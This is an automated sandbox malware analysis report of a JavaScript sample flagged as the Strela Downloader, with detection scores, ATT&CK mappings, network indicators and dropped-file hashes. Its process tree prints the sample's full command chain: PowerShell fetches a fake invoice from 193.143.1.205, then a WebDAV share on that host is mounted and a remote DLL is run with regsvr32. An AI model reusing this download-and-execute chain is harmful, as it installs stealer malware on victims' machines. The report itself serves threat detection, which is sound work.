Windows
Analysis Report
28137108151929013281.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 6192 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\28137 1081519290 13281.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 4636 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user~1 \AppData\L ocal\Temp\ invoice.pd f http://1 93.143.1.2 05/invoice .php"&&sta rt C:\User s\user~1\A ppData\Loc al\Temp\in voice.pdf& &cmd /c ne t use \\19 3.143.1.20 5@8888\dav wwwroot\&& cmd /c reg svr32 /s \ \193.143.1 .205@8888\ davwwwroot \125452628 04975.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4900 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6720 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user~1\Ap pData\Loca l\Temp\inv oice.pdf h ttp://193. 143.1.205/ invoice.ph p" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 1264 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user ~1\AppData \Local\Tem p\invoice. pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 2584 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7332 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=20 72 --field -trial-han dle=1748,i ,154708869 2394655157 2,55264225 6710029759 ,131072 -- disable-fe atures=Bac kForwardCa che,Calcul ateNativeW inOcclusio n,WinUseBr owserSpell Checker /p refetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 7180 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: frack113, Nasreddine Bencherchali: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
8% | ReversingLabs | Script-JS.Trojan.StrelaStealer | ||
5% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588295 |
Start date and time: | 2025-01-10 23:37:51 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 4s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 25 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 28137108151929013281.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/63@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 2.23.240.205, 162.159.61.3, 172.64.41.3, 184.28.90.27, 23.209.209.135, 199.232.214.172, 2.16.168.107, 2.16.168.105, 23.40.179.4, 23.40.179.78, 23.40.179.5, 23.40.179.76, 23.40.179.73, 23.40.179.71, 23.40.179.77, 23.40.179.79, 23.40.179.72, 192.168.2.7, 13.107.246.45, 52.6.155.20, 20.12.23.50, 23.217.172.185
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, time.windows.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
17:38:47 | API Interceptor | |
17:38:51 | API Interceptor | |
17:38:52 | API Interceptor | |
17:39:00 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7067122434809726 |
Encrypted: | false |
SSDEEP: | 1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqw:2JIB/wUKUKQncEmYRTwh0k |
MD5: | 56AC2CD270E70F34E79A31FEC2DFF58B |
SHA1: | C3F6A9639BD52E409A31460AD22ACD83894A3B5B |
SHA-256: | CF3925BCD0E2E305385C95F3DFB86986BEBEF6E502533BF1D2A5DEF97A723F70 |
SHA-512: | BCF4101B866DEFAEE0F6F1A79E66B27BC14EA03F5E64CC9D47F660F46E1C69E31791E6D210349BA1ACFBF99C2D89C05D8C84F83496BBBB89B6E5091176D1E84E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7899731780316563 |
Encrypted: | false |
SSDEEP: | 1536:DzLSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+D:DzLazaPvgurTd42UgSii |
MD5: | CDEDCE11DE57D75F9BBB5758DCF18061 |
SHA1: | B7F29E8A8F4088657BE6DB62670736FEF9709803 |
SHA-256: | 104AAEA60A0DD1671CB6DD9FB682014C69A7C9363275FB2D89BFA4D4A51D0A04 |
SHA-512: | 03702B9686D6CE0BA21B33A26CD24FF9AB1EFDAE2ED737885F75372E61F50B287EA8DEA5BE2549A79F2E26E3F8093237DC57D73DC71A2441CFC34FD46C13F3FB |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
